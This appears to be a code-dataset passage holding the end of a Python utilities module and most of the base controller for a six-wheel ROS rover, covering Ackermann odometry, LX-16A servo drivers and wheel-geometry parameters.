file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
def progress(iterable, *, size=None, frequency=1, header=""):
"""Generator that wraps an iterable and prints progress"""
if size is None:
size = len(iterable)
header = f"{header.capitalize()}: " if header else ""
charsize = len(str(size))
if frequency:
print(f"{header}[{'0'.rjust(charsize)}/{size}]", end=" ")
sys.stdout.flush()
time0 = time.time()
for i, element in enumerate(iterable):
yield element
i1 = i+1
if frequency and (i1 % frequency == 0 or i1 == size):
avg_time = (time.time() - time0) / i1
print(f"\r{header}[{str(i1).rjust(charsize)}/{size}] " \
f"elapsed {int(avg_time*i1/60):02d}m/{int(avg_time*size/60):02d}m", end=" ")
sys.stdout.flush()
if frequency:
print()
def capture_stdout(func, logger):
"""Redirect stdout to logger"""
sys.stdout, stdout = StringIO(), sys.stdout
func()
sys.stdout, out_text = stdout, sys.stdout.getvalue()
for line in out_text.strip().split("\n"):
logger.info(line)
# Load and save state dicts
def load_pickle(path):
"""Load pickled data from path"""
with open(path, 'rb') as handle:
return pickle.load(handle)
def save_pickle(path, data):
"""Save data to path using pickle"""
with open(path, 'wb') as handle:
pickle.dump(data, handle)
# Download
def download_files(names, root_path, base_url, logfunc=None):
"""Download file names from given url to given directory path. If logfunc given, use it to log
status."""
root_path = Path(root_path)
for name in names:
path = root_path / name
if path.exists():
continue
if logfunc:
logfunc(f"Downloading file '{name}'")
path.parent.mkdir(parents=True, exist_ok=True)
urllib.request.urlretrieve(base_url + name, path)
# Iteration
def slice_unique(ids):
"""Generate slices that mark a sequence of identical values in a given array of ids. The
sequence must be uninterrupted (compact)."""
pointer = 0
for i, counts in zip(*np.unique(ids, return_counts=True)):
seq = slice(pointer, pointer+counts)
assert (ids[seq] == i).all()
yield i, seq
pointer += counts
```
|
{
"source": "Jenifen/curio",
"score": 2
}
|
#### File: src/curio_base/base_controller.py
```python
ENABLE_ARDUINO_LX16A_DRIVER = True
if ENABLE_ARDUINO_LX16A_DRIVER:
# Load imports for the Arduino driver
from curio_msgs.msg import CurioServoCommands
from curio_msgs.msg import CurioServoPositions
else:
# Load imports for the Python serial driver
from curio_base.lx16a_driver import LX16ADriver
from curio_msgs.msg import CurioServoStates
from curio_msgs.msg import LX16AState
from curio_base.lx16a_encoder_filter import LX16AEncoderFilter
from curio_msgs.msg import CurioServoEncoders
from curio_msgs.msg import LX16AEncoder
import math
import rospy
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseWithCovariance
from geometry_msgs.msg import Twist
from geometry_msgs.msg import TwistWithCovariance
from nav_msgs.msg import Odometry
from tf.transformations import quaternion_from_euler
from tf import TransformBroadcaster
def degree(rad):
''' Convert an angle in degrees to radians
Parameters
----------
rad : float
An angle in radians
Returns
-------
float
The angle in degrees.
'''
return rad * 180.0 / math.pi
def radian(deg):
''' Convert an angle in radians to degrees
Parameters
----------
deg : float
An angle in degrees
Returns
-------
float
The angle in radians.
'''
return deg * math.pi / 180.0
def map(x, in_min, in_max, out_min, out_max):
''' Map a value in one range to its equivalent in another.
Parameters
----------
x : float
The value to be mapped
in_min : float
The minimum value the input variable can take.
in_max : float
The maximum value the input variable can take.
out_min : float
The minimum value the output variable can take.
out_max : float
The maximum value the output variable can take.
Returns
-------
float
The mapped value.
'''
return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
def clamp(x, lower, upper):
''' Clamp a value between a lower and upper bound.
Parameters
----------
x : float
The value to be clamped
in_min : float
The lower limit of the clamp.
in_max : float
The upper limit of the clamp.
Returns
-------
float
The clamped value.
'''
return min(max(x, lower), upper)
def caseless_equal(left, right):
''' A case insensitive comparison.
Parameters
----------
left : str
A string to compare.
right : str
A string to compare.
Returns
-------
bool
Return True if the strings are equal ignoring case.
'''
return left.upper() == right.upper()
def turning_radius_and_rate(v_b, omega_b, d):
''' Calculate the turning radius and rate of turn about
the instantaneous centre of curvature (ICC).
Conventions are specifiied according to ROS REP 103:
Standard Units of Measure and Coordinate Conventions
https://www.ros.org/reps/rep-0103.html.
x : forward
y : left
z : up
Example
-------
v_b >= 0, omega_b > 0 => r_p > 0 positive turn (anti-clockwise),
v_b >= 0, omega_b < 0 => r_p < 0 negative turn (clockwise),
v_b >= 0, omega_b = 0 => r_p = inf no turn.
Parameters
----------
v_b : float
The linear velocity of the base [m/s].
omega_b : float
The angular velocity of the base [rad/s].
d : float
distance between the fixed wheels [m].
Returns
-------
list
A two element list containing r_p the turning radius [m]
and and omega_p the rate of turn [rad/s]. If the motion
has no angular component then r_p is float('Inf') and
omega_p is zero.
'''
vl = v_b - d * omega_b / 2.0
vr = v_b + d * omega_b / 2.0
if vl == vr:
return float('Inf'), 0.0
else:
r_p = d * (vr + vl) / (vr - vl) / 2.0
omega_p = (vr - vl) / d
return r_p, omega_p
class MeanWindowFilter(object):
''' Simple rolling window filter.
'''
def __init__(self, window=5):
''' Constructor
Parameters
----------
window : int
The size of the rolling window, has (default 5)
'''
self._window = window
self._index = 0
self._buffer = [0.0 for i in range(window)]
self._sum = 0.0
self._mean = 0.0
def update(self, value):
''' Update the filter with the the next value.
Parameters
----------
value : float
The next value to accumulate in the filter.
'''
# Update the ring buffer
self._index = (self._index + 1) % self._window
old_value = self._buffer[self._index]
self._buffer[self._index] = value
# Update the stats
self._sum = self._sum + value - old_value
self._mean = self._sum / self._window
def get_mean(self):
''' Get the rolling mean
Returns
-------
float
The rolling mean
'''
return self._mean
def get_window(self):
''' Get the size of the rolling window
Returns
-------
int
The size of the rolling window
'''
return self._window
class Servo(object):
'''Servo properties.
Store information about the servo.
Attributes
----------
id : int
servo serial id: 0 - 253.
lon_label : int
Enumeration label for the longitudinal direction:
FRONT, MID, BACK.
lat_label : int
Enumeration label for the lateral direction: LEFT, RIGHT.
orientation : int
Flag to indicate whether the servo is installed for positive
or negtive rotation: 1, -1.
offset : int
The servo position offset (for servo rather than motor mode).
Use to centre servos.
position : list
List servo position in the robot base. Two dimensional
coordinate vector of floats.
'''
# Lateral labels
LEFT = 0
RIGHT = 1
# Longitudinal labels
FRONT = 2
MID = 3
BACK = 4
def __init__(self, id, lon_label, lat_label, orientation):
''' Constructor
Parameters
----------
id : int
servo serial id: 0 - 253.
lon_label : str
Label for the longitudinal direction:
'front', 'mid', 'back'.
lat_label : str
Label for the lateral direction: 'left', 'right'.
orientation : int
Flag to indicate whether the servo is installed for positive
or negtive rotation: 1, -1.
'''
self.id = id
self.lon_label = lon_label
self.lat_label = lat_label
self.orientation = orientation
self.offset = 0.0
self.position = [0.0, 0.0]
@staticmethod
def to_lat_label(label_str):
''' Convert a lateral label string to a enumerated value.
Parameters
----------
label_str : str
Label for the lateral direction: 'left', 'right'.
Returns
-------
int
Enumeration label for the lateral direction:
LEFT, RIGHT.
'''
if caseless_equal(label_str, 'LEFT'):
return Servo.LEFT
if caseless_equal(label_str, 'RIGHT'):
return Servo.RIGHT
else:
return -1
@staticmethod
def to_lon_label(label_str):
''' Convert a longitudinal label string to a enumerated value.
Parameters
----------
label_str : str
Label for the longitudinal direction:
'front', 'mid', 'back'.
Returns
-------
int :
Enumeration label for the longitudinal direction:
FRONT, MID, BACK.
'''
if caseless_equal(label_str, 'FRONT'):
return Servo.FRONT
if caseless_equal(label_str, 'MID'):
return Servo.MID
if caseless_equal(label_str, 'BACK'):
return Servo.BACK
else:
return -1
class AckermannOdometry(object):
''' Odometry for the base controller (6 wheel Ackermann)
This class based on its C++ equivalent in the
`ackermann_drive_controller` module which in turn was derived
from the `diff_drive_controller` in `ros_controllers`.
Original odometry code:
https://github.com/ros-controls/ros_controllers/diff_drive_controller
License: BSD-3-Clause
Copyright (c) 2013, PAL Robotics, S.L.
All rights reserved.
Authors
<NAME>
<NAME>
<NAME>
<NAME>
'''
def __init__(self, velocity_filter_window=10):
''' Constructor
Parameters
----------
velocity_filter_window : int
The size of the window used in the velocity filter,
has (default 10)
'''
self._timestamp = rospy.Time()
self._heading = 0.0 # [rad]
self._x = 0.0 # [m]
self._y = 0.0 # [m]
self._lin_vel_filter = MeanWindowFilter(window=5) # [m/s]
self._ang_vel_filter = MeanWindowFilter(window=5) # [rad/s]
self._wheel_radius = 0.06 # [m]
self._mid_wheel_lat_separation = 0.52 # [m]
self._wheel_radius_multiplier = 1.0 # [1]
self._mid_wheel_lat_separation_multiplier = 1.0 # [1]
self._num_wheels = 6
self._wheel_cur_pos = [0.0 for x in range(self._num_wheels)] # [m]
self._wheel_old_pos = [0.0 for x in range(self._num_wheels)] # [m]
self._wheel_est_vel = [0.0 for x in range(self._num_wheels)] # [m/s]
def reset(self, time):
''' Reset the odometry
Parameters
----------
time : rospy.Time
The current time.
'''
self._timestamp = time
def update_6(self, wheel_servo_pos, time):
''' Update the odometry with the latest wheel servo positions.
Parameters
----------
wheel_servo_pos : list
A list of 6 floats denoting the angular position of the
6 wheel servos [rad].
time : rospy.Time
The current time.
'''
# Adjust the wheel radius and separation by the calibrated multipliers
wheel_rad = self._wheel_radius * self._wheel_radius_multiplier
wheel_sep = self._mid_wheel_lat_separation * self._mid_wheel_lat_separation_multiplier
for i in range(self._num_wheels):
# Get the current wheel joint (linear) positions [m]
self._wheel_cur_pos[i] = wheel_servo_pos[i] * wheel_rad
# Estimate the velocity of the wheels using old and current positions
self._wheel_est_vel[i] = self._wheel_cur_pos[i] - self._wheel_old_pos[i]
# Update old position with current
self._wheel_old_pos[i] = self._wheel_cur_pos[i]
# @TODO - remove hardcoding and use a lookup instead
MID_RIGHT = 1
MID_LEFT = 4
# Compute linear and angular velocities of the mobile base (base_link frame)
lin_vel = (self._wheel_est_vel[MID_RIGHT] + self._wheel_est_vel[MID_LEFT]) * 0.5
ang_vel = (self._wheel_est_vel[MID_RIGHT] - self._wheel_est_vel[MID_LEFT]) / wheel_sep
# Integrate the velocities to get the linear and angular positions
self._integrate_velocities(lin_vel, ang_vel)
# Cannot estimate the speed for small time intervals
dt = (time - self._timestamp).to_sec()
if dt < 0.0001:
return False
# Estimate speeds using a rolling mean / mode to filter them
self._timestamp = time
# Add to velocity filters
self._lin_vel_filter.update(lin_vel/dt)
self._ang_vel_filter.update(ang_vel/dt)
return True
def update_2(self, wheel_servo_pos, time):
''' Update the odometry with the mid wheel servo positions.
Parameters
----------
wheel_servo_pos : list
A list of 2 floats denoting the angular position of the
2 mid wheel servos [rad]
time : rospy.Time
The current time.
'''
# Adjust the wheel radius and separation by the calibrated multipliers
wheel_rad = self._wheel_radius * self._wheel_radius_multiplier
wheel_sep = self._mid_wheel_lat_separation * self._mid_wheel_lat_separation_multiplier
for i in range(2):
# Get the current wheel joint (linear) positions [m]
self._wheel_cur_pos[i] = wheel_servo_pos[i] * wheel_rad
# Estimate the velocity of the wheels using old and current positions
self._wheel_est_vel[i] = self._wheel_cur_pos[i] - self._wheel_old_pos[i]
# Update old position with current
self._wheel_old_pos[i] = self._wheel_cur_pos[i]
LEFT = Servo.LEFT
RIGHT = Servo.RIGHT
# Compute linear and angular velocities of the mobile base (base_link frame)
lin_vel = (self._wheel_est_vel[RIGHT] + self._wheel_est_vel[LEFT]) * 0.5
ang_vel = (self._wheel_est_vel[RIGHT] - self._wheel_est_vel[LEFT]) / wheel_sep
# Integrate the velocities to get the linear and angular positions
self._integrate_velocities(lin_vel, ang_vel)
# Cannot estimate the speed for small time intervals
dt = (time - self._timestamp).to_sec()
if dt < 0.0001:
return False
# Estimate speeds using a rolling mean / mode to filter them
self._timestamp = time
# Add to velocity filters
self._lin_vel_filter.update(lin_vel/dt)
self._ang_vel_filter.update(ang_vel/dt)
return True
def get_heading(self):
''' Get the heading [rad]
The heading in radians, with zero being along the longtidinal
axis (x), and positive rotation is towards the positive lateral
axis (y) to the left.
Returns
-------
float
The heading in radians.
'''
return self._heading
def get_x(self):
''' Get the x position [m]
Returns
-------
float
The x position [m].
'''
return self._x
def get_y(self):
''' Get the y position [m]
Returns
-------
float
The y position [m].
'''
return self._y
def get_lin_vel(self):
''' Get the linear velocity of the body [m/s]
Returns
-------
float
The linear velocity of the `base_link` [m/s].
'''
return self._lin_vel_filter.get_mean()
def get_ang_vel(self):
''' Get the angular velocity of the body [rad/s]
Returns
-------
float
The angular velocity of the `base_link` [rad/s].
'''
return self._ang_vel_filter.get_mean()
def set_wheel_params(self,
wheel_radius,
mid_wheel_lat_separation,
wheel_radius_multiplier=1.0,
mid_wheel_lat_separation_multiplier=1.0):
''' Set the wheel and steering geometry.
Note: all wheels are assumed to have the same radius, and the
mid wheels do not steer.
Parameters
----------
wheel_radius : float
The radius of the wheels [m].
mid_wheel_lat_separation : float
The lateral separation [m] of the mid wheels.
wheel_radius_multiplier : float
Wheel radius calibration multiplier to tune odometry,
has (default = 1.0).
mid_wheel_lat_separation_multiplier : float
Wheel separation calibration multiplier to tune odometry,
has (default = 1.0).
'''
self._wheel_radius = wheel_radius
self._mid_wheel_lat_separation = mid_wheel_lat_separation
self._wheel_radius_multiplier = wheel_radius_multiplier
self._mid_wheel_lat_separation_multiplier = mid_wheel_lat_separation_multiplier
def _integrate_velocities(self, lin_vel, ang_vel):
''' Integrate the current velocities to obtain the current
position and heading.
Parameters
----------
lin_vel : float
The linear velocity of the `base_link`.
ang_vel : float
The angular velocity of the `base_link`.
'''
if math.fabs(ang_vel) < 1e-6:
self._integrate_runge_kutta2(lin_vel, ang_vel)
else:
# Exact integration (should solve problems when angular is zero):
heading_old = self._heading
r = lin_vel/ang_vel
self._heading = self._heading + ang_vel
self._x = self._x + r * (math.sin(self._heading) - math.sin(heading_old))
self._y = self._y - r * (math.cos(self._heading) - math.cos(heading_old))
def _integrate_runge_kutta2(self, lin_vel, ang_vel):
''' Integrate the current velocities to obtain the current
position and heading.
Parameters
----------
lin_vel : float
The linear velocity of the `base_link`.
ang_vel : float
The angular velocity of the `base_link`.
'''
direction = self._heading + ang_vel * 0.5
# Runge-Kutta 2nd order integration:
self._x = self._x + lin_vel * math.cos(direction)
self._y = self._y + lin_vel * math.sin(direction)
self._heading = self._heading + ang_vel
class BaseController(object):
''' Mobile base controller for 6-wheel powered Ackerman steering.
A 6-wheel Ackerman steering mobile base controller where each wheel
is driven by a servo and there are 4-steering servos for each
of the corner wheels.
The LX-16A servos may be position controlled through an
angle of 240 deg. This range is not enough to allow in-place
steering, so we specify an angle (REVERSE_SERVO_ANGLE) at which
the servos are reversed, so for example an angle of +130 deg is
reversed to an angle of 130 - 180 = -50 deg.
REVERSE_SERVO_ANGLE should be set to 90 deg.
Attributes
----------
LINEAR_VEL_MAX : float
The maximum linear velocity limit of the `base_link`,
has (constant 0.37) [m/s]
ANGULAR_VEL_MAX : float
The maximum angular velocity limit of the `base_link`,
has (constant 1.45) [rad/s]
SERVO_ANG_VEL_MAX : float
The maximum angular velocity limit of the servo,
has (constant 2 * pi) [rad/s]
SERVO_DUTY_MAX : int
The maximum duty for the servo, has (constant 1000).
REVERSE_SERVO_ANGLE : float
The angle at which we reverse the servo by 180 deg,
has (constant 90 deg)
SERVO_ANGLE_MAX : float
Maximum (abs) angle at which the servo can be set,
has (constant 120 deg)
SERVO_POS_MIN : int
Minimum servo position (servo units), has (constant 0)
SERVO_POS_MAX : int
Maximum servo position (servo units), has (constant 1000)
NUM_WHEELS : int
The number of wheel servos), has (constant 6)
NUM_STEERS : int
The number of steering servos), has (constant 4)
ROS Parameters
--------------
~wheel_radius : float
The wheel radius [m]
~mid_wheel_lat_separation : float
The lateral distance [m] between the mid wheels
~front_wheel_lat_separation : float
The lateral distance [m] between the front wheels
~front_wheel_lon_separation : float
The longitudinal distance [m] from the front wheels to
the mid wheels.
~back_wheel_lat_separation : float
The lateral distance [m] between the back wheels
~back_wheel_lon_separation : float
The longitudinal distance [m] from the back wheels to
the mid wheels.
~wheel_radius_multiplier : float
Wheel radius calibration multiplier to tune odometry,
has (default = 1.0).
~mid_wheel_lat_separation_multiplier : float
Wheel separation calibration multiplier to tune odometry,
has (default = 1.0).
~wheel_servo_ids : list
An array of integer wheel servo serial ids : 0 - 253
~wheel_servo_lon_labels : list
An array of wheel servo longitudinal position labels:
'front', 'mid', 'right'
~wheel_servo_lat_labels : list
An array of wheel servo lateral position labels:
'left', 'right'
~steer_servo_ids : list
An array of integer steering servo serial ids : 0 - 253
~steer_servo_lon_labels : list
An array of steering servo longitudinal position labels:
'front', 'mid', 'right'
~steer_servo_lat_labels : list
An array of steering servo lateral position labels:
'left', 'right'
~steer_servo_angle_offsets : list
An array of integer steering servo angle adjustments,
used to trim of the steering angle.
~port : str
The device name for the serial port (e.g. /dev/ttyUSB0)
~baudrate : int
The baudrate, has default (115200).
~timeout : float
The time in seconds out for the serial connection,
has (default 1.0)
~classifier_window : int
The size of the classifier window, this sets the number of
entries in the servo history used to train the classifier.
The classifier and regressor models must correspond to this
setting. (default 10)
~classifier_filename : str
The full filepath for the `scikit-learn` classifier model.
~regressor_filename : str
The full filepath for the `scikit-learn` regressor model.
Publications
------------
odom : nav_msgs/Odometry
Publish the odometry.
tf : geometry_msgs/TransformStamped
Broadcast the transfrom from `odom` to `base_link`
servo/encoders : curio_msgs/CurioServoEncoders
Publish servo encoder states
servo/states : curio_msgs/CurioServoStates
Publish the servo states
(Python serial only)
servo/commands : curio_msgs/CurioServoCommands
Publish servo commands to the servo controller
(Arduino serial only)
Subscriptions
-------------
cmd_vel : geometry_msgs/Twist
Subscribe to `cmd_vel`.
servo/positions : curio_msgs/CurioServoPositions
Subscribe to servo positions from the servo controller
(Arduino serial only)
'''
# Velocity limits for the rover
LINEAR_VEL_MAX = 0.37
ANGULAR_VEL_MAX = 1.45
# Servo limits - LX-16A has max angular velocity of approx 1 revolution per second
SERVO_ANG_VEL_MAX = 2 * math.pi
SERVO_DUTY_MAX = 1000
# Steering angle limits
REVERSE_SERVO_ANGLE = 90.0 # The angle at which we reverse the servo by 180 deg.
SERVO_ANGLE_MAX = 120.0 # Maximum (abs) angle at which the servo can be set.
SERVO_POS_MIN = 0.0 # Minimum servo position (servo units).
SERVO_POS_MAX = 1000.0 # Maximum servo position (servo units).
# 6 wheels, 4 steering.
NUM_WHEELS = 6
NUM_STEERS = 4
class PythonServoDriver(object):
''' Servo driver abstraction
'''
def __init__(self, wheel_servos, steer_servos):
''' Constructor
'''
self._wheel_servos = wheel_servos
self._steer_servos = steer_servos
# LX-16A servo driver - all parameters are required
rospy.loginfo('Opening connection to servo bus board...')
port = rospy.get_param('~port')
baudrate = rospy.get_param('~baudrate')
timeout = rospy.get_param('~timeout')
self._servo_driver = LX16ADriver()
self._servo_driver.set_port(port)
self._servo_driver.set_baudrate(baudrate)
self._servo_driver.set_timeout(timeout)
self._servo_driver.open()
rospy.loginfo('is_open: {}'.format(self._servo_driver.is_open()))
rospy.loginfo('port: {}'.format(self._servo_driver.get_port()))
rospy.loginfo('baudrate: {}'.format(self._servo_driver.get_baudrate()))
rospy.loginfo('timeout: {:.2f}'.format(self._servo_driver.get_timeout()))
# Publishers
self._states_msg = CurioServoStates()
self._states_pub = rospy.Publisher('servo/states', CurioServoStates, queue_size=10)
self._wheel_states = [LX16AState() for x in range(BaseController.NUM_WHEELS)]
self._steer_states = [LX16AState() for x in range(BaseController.NUM_STEERS)]
def set_steer_command(self, i, position):
''' Set the servo steering command
'''
servo = self._steer_servos[i]
self._servo_driver.servo_mode_write(servo.id)
self._servo_driver.move_time_write(servo.id, position, 50)
def set_wheel_command(self, i, duty):
''' Set the servo wheel command
'''
servo = self._wheel_servos[i]
state = self._wheel_states[i]
state.command = duty
self._servo_driver.motor_mode_write(servo.id, duty)
def publish_commands(self):
''' Publish the servo commands
'''
pass
def get_wheel_position(self, i):
''' Get the servo position for the i-th wheel
'''
servo = self._wheel_servos[i]
state = self._wheel_states[i]
pos = self._servo_driver.pos_read(servo.id)
state.position = pos
return pos
def set_angle_offset(self, i, deviation):
''' Set the steering angle offset (trim)
'''
servo = self._steer_servos[i]
self._servo_driver.angle_offset_adjust(servo.id, servo.offset)
# self._servo_driver.angle_offset_write(servo.id)
# @TODO: check and test
def update_states(self, time):
''' Update the servo states
Parameters
----------
time : rospy.Time
The current time.
'''
for i in range (BaseController.NUM_WHEELS):
servo = self._wheel_servos[i]
state = self._wheel_states[i]
state.id = servo.id
# state.temperature = self._servo_driver.temp_read(servo.id)
# state.voltage = self._servo_driver.vin_read(servo.id)
# state.angle_offset = self._servo_driver.angle_offset_read(servo.id)
state.mode = LX16AState.LX16A_MODE_MOTOR
for i in range (BaseController.NUM_STEERS):
servo = self._steer_servos[i]
state = self._steer_states[i]
state.id = servo.id
# state.temperature = self._servo_driver.temp_read(servo.id)
# state.voltage = self._servo_driver.vin_read(servo.id)
# state.angle_offset = self._servo_driver.angle_offset_read(servo.id)
state.mode = LX16AState.LX16A_MODE_SERVO
# @TODO: check and test
def publish_states(self, time):
''' Publish the servo states
Parameters
----------
time : rospy.Time
The current time.
'''
# Header
self._states_msg.header.stamp = time
self. _states_msg.header.frame_id = 'base_link'
# LX16A state
self._states_msg.wheel_servo_states = self._wheel_states
self._states_msg.steer_servo_states = self._steer_states
# Publish rover state
self._states_pub.publish(self._states_msg)
class ArduinoServoDriver(object):
''' Servo driver abstraction
'''
def __init__(self, wheel_servos, steer_servos):
''' Constructor
'''
self._wheel_servos = wheel_servos
self._steer_servos = steer_servos
# Servo positions
self._servo_pos_msg = CurioServoPositions()
self._servo_pos_msg.wheel_positions = [0 for i in range(BaseController.NUM_WHEELS)]
self._servo_pos_msg.steer_positions = [0 for i in range(BaseController.NUM_STEERS)]
self._servo_pos_sub = rospy.Subscriber('/servo/positions', CurioServoPositions, self._servo_pos_callback)
# Servo commands
self._servo_cmd_msg = CurioServoCommands()
self._servo_cmd_msg.wheel_commands = [0 for i in range(BaseController.NUM_WHEELS)]
self._servo_cmd_msg.steer_commands = [0 for i in range(BaseController.NUM_STEERS)]
self._servo_cmd_pub = rospy.Publisher('/servo/commands', CurioServoCommands, queue_size=10)
def set_steer_command(self, i, position):
''' Set the servo steering command
'''
self._servo_cmd_msg.steer_commands[i] = position
def set_wheel_command(self, i, duty):
''' Set the servo wheel command
'''
self._servo_cmd_msg.wheel_commands[i] = duty
def publish_commands(self):
''' Publish the servo commands
'''
self._servo_cmd_pub.publish(self._servo_cmd_msg)
def get_wheel_position(self, i):
''' Get the servo position for the i-th wheel
'''
return self._servo_pos_msg.wheel_positions[i]
def set_angle_offset(self, i, deviation):
''' Set the steering angle offset (trim)
'''
pass
def _servo_pos_callback(self, msg):
''' Callback for the subscription to `/servos/positions`.
Parameters
----------
msg : curio_msgs.msg/CurioServoStates
The message for the servo positions.
'''
self._servo_pos_msg = msg
def __init__(self):
''' Constructor
'''
rospy.loginfo('Initialising BaseController...')
# Wheel geometry on a flat surface - defaults
self._wheel_radius = 0.060
self._mid_wheel_lat_separation = 0.052
self._front_wheel_lat_separation = 0.047
self._front_wheel_lon_separation = 0.028
self._back_wheel_lat_separation = 0.047
self._back_wheel_lon_separation = 0.025
if rospy.has_param('~wheel_radius'):
self._wheel_radius = rospy.get_param('~wheel_radius')
if rospy.has_param('~mid_wheel_lat_separation'):
self._mid_wheel_lat_separation = rospy.get_param('~mid_wheel_lat_separation')
if rospy.has_param('~front_wheel_lat_separation'):
self._front_wheel_lat_separation = rospy.get_param('~front_wheel_lat_separation')
if rospy.has_param('~front_wheel_lon_separation'):
self._front_wheel_lon_separation = rospy.get_param('~front_wheel_lon_separation')
if rospy.has_param('~back_wheel_lat_separation'):
self._back_wheel_lat_separation = rospy.get_param('~back_wheel_lat_separation')
if rospy.has_param('~back_wheel_lon_separation'):
self._back_wheel_lon_separation = rospy.get_param('~back_wheel_lon_separation')
rospy.loginfo('wheel_radius: {:.2f}'.format(self._wheel_radius))
rospy.loginfo('mid_wheel_lat_separation: {:.2f}'.format(self._mid_wheel_lat_separation))
rospy.loginfo('front_wheel_lat_separation: {:.2f}'.format(self._front_wheel_lat_separation))
rospy.loginfo('front_wheel_lon_separation: {:.2f}'.format(self._front_wheel_lon_separation))
rospy.loginfo('back_wheel_lat_separation: {:.2f}'.format(self._back_wheel_lat_separation))
rospy.loginfo('back_wheel_lon_separation: {:.2f}'.format(self._back_wheel_lon_separation))
# Odometry calibration parameters
self._wheel_radius_multiplier = 1.0
self._mid_wheel_lat_separation_multiplier = 1.0
if rospy.has_param('~wheel_radius_multiplier'):
self._wheel_radius_multiplier = rospy.get_param('~wheel_radius_multiplier')
if rospy.has_param('~mid_wheel_lat_separation_multiplier'):
self._mid_wheel_lat_separation_multiplier = rospy.get_param('~mid_wheel_lat_separation_multiplier')
rospy.loginfo('wheel_radius_multiplier: {:.2f}'
.format(self._wheel_radius_multiplier))
rospy.loginfo('mid_wheel_lat_separation_multiplier: {:.2f}'
.format(self._mid_wheel_lat_separation_multiplier))
def calc_position(lon_label, lat_label):
''' Calculate servo positions using the wheel geometry parameters
'''
if lon_label == Servo.FRONT:
if lat_label == Servo.LEFT:
return [self._front_wheel_lon_separation, self._front_wheel_lat_separation/2.0]
if lat_label == Servo.RIGHT:
return [self._front_wheel_lon_separation, -self._front_wheel_lat_separation/2.0]
if lon_label == Servo.MID:
if lat_label == Servo.LEFT:
return [0.0, self._mid_wheel_lat_separation/2.0]
if lat_label == Servo.RIGHT:
return [0.0, -self._mid_wheel_lat_separation/2.0]
if lon_label == Servo.BACK:
if lat_label == Servo.LEFT:
return [-self._back_wheel_lon_separation, self._back_wheel_lat_separation/2.0]
if lat_label == Servo.RIGHT:
return [-self._back_wheel_lon_separation, -self._back_wheel_lat_separation/2.0]
return [0.0, 0.0]
# Utility for validating servo parameters
def validate_servo_param(param, name, expected_length):
if len(param) != expected_length:
rospy.logerr("Parameter '{}' must be an array length {}, got: {}"
.format(name, expected_length, len(param)))
exit()
# Wheel servo parameters - required
wheel_servo_ids = rospy.get_param('~wheel_servo_ids')
wheel_servo_lon_labels = rospy.get_param('~wheel_servo_lon_labels')
wheel_servo_lat_labels = rospy.get_param('~wheel_servo_lat_labels')
validate_servo_param(wheel_servo_ids, 'wheel_servo_ids', BaseController.NUM_WHEELS)
validate_servo_param(wheel_servo_lon_labels, 'wheel_servo_lon_labels', BaseController.NUM_WHEELS)
validate_servo_param(wheel_servo_lat_labels, 'wheel_servo_lat_labels', BaseController.NUM_WHEELS)
self._wheel_servos = []
for i in range(BaseController.NUM_WHEELS):
id = wheel_servo_ids[i]
lon_label = Servo.to_lon_label(wheel_servo_lon_labels[i])
lat_label = Servo.to_lat_label(wheel_servo_lat_labels[i])
orientation = 1 if lat_label == Servo.LEFT else -1
servo = Servo(id, lon_label, lat_label, orientation)
servo.position = calc_position(lon_label, lat_label)
self._wheel_servos.append(servo)
rospy.loginfo('servo: id: {}, lon_label: {}, lat_label: {}, orientation: {}, offset: {}, position: {}'
.format(servo.id, servo.lon_label, servo.lat_label, servo.orientation, servo.offset, servo.position))
# Steer servo parameters - required
steer_servo_ids = rospy.get_param('~steer_servo_ids')
steer_servo_lon_labels = rospy.get_param('~steer_servo_lon_labels')
steer_servo_lat_labels = rospy.get_param('~steer_servo_lat_labels')
steer_servo_angle_offsets = rospy.get_param('~steer_servo_angle_offsets')
validate_servo_param(steer_servo_ids, 'steer_servo_ids', BaseController.NUM_STEERS)
validate_servo_param(steer_servo_lon_labels, 'steer_servo_lon_labels', BaseController.NUM_STEERS)
validate_servo_param(steer_servo_lat_labels, 'steer_servo_lat_labels', BaseController.NUM_STEERS)
validate_servo_param(steer_servo_angle_offsets, 'steer_servo_angle_offsets', BaseController.NUM_STEERS)
self._steer_servos = []
for i in range(BaseController.NUM_STEERS):
id = steer_servo_ids[i]
lon_label = Servo.to_lon_label(steer_servo_lon_labels[i])
lat_label = Servo.to_lat_label(steer_servo_lat_labels[i])
orientation = -1
servo = Servo(id, lon_label, lat_label, orientation)
servo.offset = steer_servo_angle_offsets[i]
servo.position = calc_position(lon_label, lat_label)
self._steer_servos.append(servo)
rospy.loginfo('servo: id: {}, lon_label: {}, lat_label: {}, orientation: {}, offset: {}, position: {}'
.format(servo.id, servo.lon_label, servo.lat_label, servo.orientation, servo.offset, servo.position))
# Select whether to use the Python or Arduino servo driver
if ENABLE_ARDUINO_LX16A_DRIVER:
self._servo_driver = BaseController.ArduinoServoDriver(
self._wheel_servos, self._steer_servos)
else:
self._servo_driver = BaseController.PythonServoDriver(
self._wheel_servos, self._steer_servos)
# Commanded velocity
self._cmd_vel_timeout = rospy.Duration(0.5)
self._cmd_vel_last_rec_time = rospy.get_rostime()
self._cmd_vel_msg = Twist()
self._cmd_vel_sub = rospy.Subscriber('/cmd_vel', Twist, self._cmd_vel_callback)
# Tuning / calibration
rospy.loginfo('Setting steer servo offsets...')
self.set_steer_servo_offsets()
# Odometry
rospy.loginfo('Initialise odometry...')
self._odometry = AckermannOdometry()
self._odometry.reset(rospy.get_rostime())
self._odometry.set_wheel_params(
self._wheel_radius,
self._mid_wheel_lat_separation,
self._wheel_radius_multiplier,
self._mid_wheel_lat_separation_multiplier)
self._odom_msg = Odometry()
self._odom_pub = rospy.Publisher('/odom', Odometry, queue_size=10)
self._init_odometry()
# Encoder filters
self._classifier_window = rospy.get_param('~classifier_window', 10)
if not rospy.has_param('~classifier_filename'):
rospy.logerr('Missing parameter: classifier_filename. Exiting...')
self._classifier_filename = rospy.get_param('~classifier_filename')
if not rospy.has_param('~regressor_filename'):
rospy.logerr('Missing parameter: regressor_filename. Exiting...')
self._regressor_filename = rospy.get_param('~regressor_filename')
self._wheel_servo_duty = [0 for i in range(BaseController.NUM_WHEELS)]
self._encoder_filters = [
LX16AEncoderFilter(
classifier_filename = self._classifier_filename,
regressor_filename = self._regressor_filename,
window=self._classifier_window)
for i in range(BaseController.NUM_WHEELS)
]
for i in range(BaseController.NUM_WHEELS):
# Invert the encoder filters on the right side
servo = self._wheel_servos[i]
